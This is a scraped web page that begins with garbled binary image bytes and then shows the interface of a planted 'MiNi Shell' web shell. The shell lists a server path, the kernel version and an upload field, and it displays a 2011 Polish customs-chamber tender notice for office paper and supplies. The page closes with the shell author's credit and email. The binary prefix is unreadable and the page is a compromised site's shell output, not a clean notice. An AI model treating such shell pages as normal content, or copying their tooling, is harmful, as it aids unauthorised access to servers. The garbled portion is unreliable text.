JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110315/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110315/43926-N-2011.html

<p class="kh_header"><b>Katowice: Zakup wraz z dostawą papieru kserograficznego i materiałów biurowych.</b><br>
<b>Numer ogłoszenia: 43926 - 2011; data zamieszczenia: 15.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Izba Celna w Katowicach , Plac Grunwaldzki 8-10, 40-127 Katowice, woj. śląskie, tel. 032 3587161, faks 032 3587204.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.katowice.ic.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup wraz z dostawą papieru kserograficznego i materiałów biurowych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Papier kserograficzny, biały, formatu A-4, o gramaturze 80g/m2, o białości min. 146 wg skali CIE,  wyprodukowany z mas celulozowych bielonych bez udziału chloru elementarnego. Każda ryza papieru powinna zawierać 500 arkuszy papieru, oraz winna być opakowana w obwolutę odporną na wilgoć	14 000 ryz
papier kserograficzny, biały, formatu A-3, o gramaturze 80g/m2, o białości min. 146 wg skali CIE,  wyprodukowany z mas celulozowych bielonych bez udziału chloru elementarnego. Każda ryza papieru powinna zawierać 500 arkuszy papieru, oraz winna być opakowana w obwolutę odporną na wilgoć	300 ryz
karton archiwizacyjny pełny (nie ścięty), na zawartość segregatora formatu A4, wykonany ze sztywnego kartonu, o wymiarach minimalnych: 340 x 95 x 265 mm, zawierający miejsce do opisu zawartości oraz otwory ułatwiające wyjmowanie i przenoszenie kartonu 10 000 szt.teczka zawieszkowa (oczkowa), tekturowa, na dokumenty formatu A4, z wąsem metalowym, (pełna okładka) z zaznaczonym/oznaczonym polem na opis teczki,  ze wzmocnieniem na całej długości teczki mechanizmu skoroszytowego	2000 szt.
teczka wiązana, kartonowa, na dokumenty formatu A4, posiadająca trzy wewnętrzne klapy o szer. min 75 mm,  zabezpieczające dokument przed wypadnięciem	10 000 szt.
koperta C-5, samoklejąca, biała lub brązowa, bez okna, o gramaturze min. 70 g/m2 (opakowanie po 500 szt.)	40 opakowań 
koperta DL, samoklejąca, biała,  (opakowanie po 1000 szt.)	60 opakowań
koperta C-4, samoklejąca, biała (opakowanie po 250 szt.)	2 opakowania
folia stretch, grubość 23 microny, o wymiarach 200m x 500mm, waga netto min.: 1,5 kg.	30 rolek
taśma pakowa, brązowa, o minimalnych wymiarach  48 mm x 46 m, wytrzymała na zrywanie, przeznaczona do (zawijarki)	300 szt.
zeszyt A-4, w kratkę, w sztywnej oprawie,  kartki zszywane (min.96 kart.)	50 szt.
notatnik, blok biurowy w kratkę  (min. 50 kart), formatu A-4	100 szt.
notatnik, blok biurowy w kratkę  (min. 50 kart), formatu A-5	100 szt.
zszywacz biurowy:
- część mechaniczna wykonana z metalu,
- zszywający min.30 kartek (papieru 80g/m2)
- zszywający zszywkami 24/6	80 szt.
zszywki  o wymiarze 23/8 (min 1000 szt. w opakowaniu)	100 opakowań 
zszywki  o wymiarze 23/10 (min 1000 szt. w opakowaniu)	100 opakowań
zszywki o wymiarze 23/13 (min 1000 szt. w opakowaniu)	100 opakowań
taśma klejąca przezroczysta, o wym. min. 18 mm  x  min. 30 m	300 szt.
karteczki samoprzylepne o wymiarach:  min.75 mm x min. 75 mm, liczba arkuszy w bloczku min. 100,	500 bloczków
wąsy do skoroszytów, wykonane z polipropylenu, w opakowaniu po 25 szt.	60 opakowań
marker permanentny, uniwersalny, do użytku biurowego, z końcówką okrągłą o grubości od 1,5 do 3,00 mm, wkład w kolorze czarnym	200 szt.
marker permanentny, uniwersalny, do użytku biurowego, w tym. m.in. do  opisywania płyt CD , z końcówką okrągłą o grubości  do 1,00 mm, wkład w kolorze czarnym	5 szt. 
cienkopisy wkład w kolorze czerwonym, czarnym, zielonym  
(w komplecie 3 szt. - po 1 szt. z każdego koloru)	100 kompletów
klej w sztyfcie  (wielkość: min.:  40 g) do klejenia papieru	300 szt.
nożyczki, ostrza wykonane ze stali nierdzewnej, rączka ergonomiczna z odpornego na pęknięcia tworzywa, ostrza o długości min. 7 cm - max. 9 cm	50 szt.
szybkoschnący korektor na bazie wody, o pojemności min.: 20 ml	50 szt.
naklejki na segregator, o szerokości 7 cm, długości min. 15 cm, opakowanie po min. 10 szt.	500 opakowań
linijka wykonana z przezroczystego plastiku, o długości 30 cm	50 szt.
długopisy z wymiennym wkładem, z końcówką max. 0,5 mm, wkład w kolorze czarnym lub granatowym , z mechanizmem chowania wkładu, gumowym uchwytem  + 1 szt. dodatkowy wkład do długopisu 	1300 szt.
grzbiety do bindowania 6 mm, kolor czarny	200 szt.
grzbiety do bindowania 8 mm, kolor czarny 	200 szt.
grzbiety do bindowania  10 mm, kolor czarny 	200 szt.
grzbiety do bindowania 14 mm,  kolor czarny	200 szt.
grzbiety do bindowania 20 mm,  kolor czarny	200 szt.
grzbiety do bindowania 25mm,  kolor czarny	200 szt.
grzbiety do bindowania 30mm,  kolor czarny	200 szt.
okładki foliowe, przezroczyste do bindowania dokumentów formatu A4,  
folia 200 mic.,  opakowanie po 100 szt.	20 opakowań
okładki kartonowe do bindowania dokumentów formatu A-4, o gramaturze min. 230g/m2 opakowanie po 100 szt., (w kolorze czarnym, ciemno zielonym lub granatowym)	20 opakowań
worki strunowe - wys.min.400 mm  ( opakowanie 100 szt.)	10 opakowań
plomby ołowiane 10	100 kg
drut do plomb cięty 30 cm	30 kg
sznurek do wiązania akt (murarski) - ( w opakowaniu 25 dkg +/- 5 %)	100 opakowań
tusz wodny do stempli z gumową i polimerową płytką stemplującą w kolorze zielonym, o pojemności min. 25 ml, z końcówką ułatwiającą nasączanie  poduszek oraz nakrętką w kolorze tuszu.	300 szt.
ołówek biurowy HB	200 szt.
gumka do ołówka, nie brudząca i  nie naruszająca struktury papieru	100 szt.
teczka do podpisu na dokumenty formatu A-4, wykonana z kartonu i pokryta folią polipropylenową lub skóropodobnym tworzywem, grzbiet harmonijkowy (rozciągliwy), zawierająca min. 15  przekładek 	200 szt.
obwoluta A4  (koszulka)(opakowanie po 100 szt.), z możliwością wpięcia do segregatorów	100 opakowań
kalkulator o następujących parametrach technicznych: min. 10 pozycyjny wyświetlacz o regulowanym kącie nachylenia, wymiary wyświetlacza: min. 15 mm x 80 mm, wymiary kalkulatora min.140 mm x 95 mm,  pamięć, klawisz podwójnego zera,  klawisz zmiany znaku +/-, separator części tysięcznych, korekta/cofanie ostatniego znaku, ustawianie ilości miejsc po przecinku, podwójne zasilanie,	50 szt.
wzmocnione kółka samoprzylepne ( w opakowaniu 250 szt.) 	5 opakowań
rozszywacz metalowy, z uchwytem plastikowym, pozwalający na łatwe usuwanie wszystkich rodzajów zszywek z dokumentów	100 szt.
koperta płacowa składanka 240x4 ( w opakowaniu 1800 szt.) 	15 opakowań

UWAGA: w przypadku zaoferowania innych ilości sztuk w opakowaniu zbiorczym, dopuszcza się wprowadzenie zmiany w formularzu ofertowym w zakresie ilości opakowań, pod warunkiem, że ogólna ilość ( iloczyn)  nie ulegnie zmianie.
Zamawiający nie dopuszcza zmian charakterystyki technicznej materiałów. Wykonawca zobowiązany jest do określenia w ofertach,  niezależnie od powyższych wymogów,  nazw własnych materiałów w pozycjach określonych przez Zamawiającego.
Zamawiający zastrzega sobie prawo do wezwania Wykonawcy do przedstawienia próbek towaru zaproponowanego w ofercie.
Poszczególne asortymenty stanowiące przedmiot zamówienia muszą być jednorodne.
Przedmiot zamówienia musi być objęty minimum 12 miesięcznym okresem ważności. 
Przedmiot zamówienia należy dostarczyć do Magazynu Zamawiającego - Katowice, Pl. Grunwaldzki 8-10 lub Chorzów-Batory, ul. Piekarska 1 
Rozładunek papieru winien odbywać się samochodem wyposażonym w windę lub musi być zapewnione przez Wykonawcę, inne urządzenie umożliwiające sprawny rozładunek. Każda dostawa w określonym zakresie odbywa się na kosz Wykonawcy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.76.44-2, 30.19.92.30-1, 22.80.00.00-8, 39.29.30.00-2, 44.61.71.00-9, 30.19.21.25-3, 39.24.12.00-5, 30.19.73.20-5, 30.19.71.00-7, 39.29.25.00-0, 30.14.11.00-0, 30.19.21.21-5, 39.26.40.00-0, 22.81.50.00-6, 22.81.60.00-3, 22.81.63.00-6, 44.33.30.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 17.06.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie pobiera się</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania warunków udziału w postępowaniu o udzielenie zamówienia, Wykonawca wraz z ofertą winien złożyć: Oświadczenie o spełnianiu warunków udziału w postępowaniu o których mowa w art. 22 ust. 1 Zamawiający dokona oceny spełniania przez Wykonawców w/wym. warunku na podstawie oświadczenia. Ocena spełniania warunków dokonywana będzie w systemie 0 - 1 (zero - jedynkowym, tj. spełnia - nie spełnia).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania warunków udziału w postępowaniu o udzielenie zamówienia, Wykonawca wraz z ofertą winien złożyć: Oświadczenie o spełnianiu warunków udziału w postępowaniu o których mowa w art. 22 ust. 1 Zamawiający dokona oceny spełniania przez Wykonawców w/wym. warunku na podstawie oświadczenia. Ocena spełniania warunków dokonywana będzie w systemie 0 - 1 (zero - jedynkowym, tj. spełnia - nie spełnia).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania warunków udziału w postępowaniu o udzielenie zamówienia, Wykonawca wraz z ofertą winien złożyć: Oświadczenie o spełnianiu warunków udziału w postępowaniu o których mowa w art. 22 ust. 1 Zamawiający dokona oceny spełniania przez Wykonawców w/wym. warunku na podstawie oświadczenia. Ocena spełniania warunków dokonywana będzie w systemie 0 - 1 (zero - jedynkowym, tj. spełnia - nie spełnia).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania warunków udziału w postępowaniu o udzielenie zamówienia, Wykonawca wraz z ofertą winien złożyć: Oświadczenie o spełnianiu warunków udziału w postępowaniu o których mowa w art. 22 ust. 1 Zamawiający dokona oceny spełniania przez Wykonawców w/wym. warunku na podstawie oświadczenia. Ocena spełniania warunków dokonywana będzie w systemie 0 - 1 (zero - jedynkowym, tj. spełnia - nie spełnia).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo do reprezentowania o ile ofertę składa pełnomocnik.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje następujące możliwości dokonania zmian postanowień zawartej umowy:
1)	zmiany wartości umowy - w przypadku zwiększenia bądź zmniejszenia stawek podatku od towarów i usług, podatku akcyzowego, cła na podstawie odrębnych przepisów, które wejdą w życie po dniu zawarcia Umowy, a przed wykonaniem przez Wykonawcę obowiązku po wykonaniu, którego Wykonawca jest uprawniony do uzyskania wynagrodzenia, wynagrodzenie Wykonawcy może ulec odpowiedniemu zwiększeniu bądź zmniejszeniu, jeżeli w wyniku zastosowania zmienionych stawek podatków ulega zmianie kwota należnego podatku oraz wynagrodzenie Wykonawcy uwzględniające podatek od towarów i usług, podatek akcyzowy cło.
2)	zmiany umówionego terminu  wykonania zamówienia  - z powodu działań osób trzecich uniemożliwiająch wykonanie zamówienia, które to działania nie są konsekwencją winy którejkolwiek ze stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.katowice.ic.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Izby Celnej w Katowicach, 40-127 Katowice, Pl. Grunwaldzki 8-10 pok. 250, II piętro..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.03.2011 godzina 10:00, miejsce: Siedziba Izby Celnej w Katowicach, 40-127 Katowice, Pl. Grunwaldzki 8-10, Kancelaria pok.222, II piętro..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com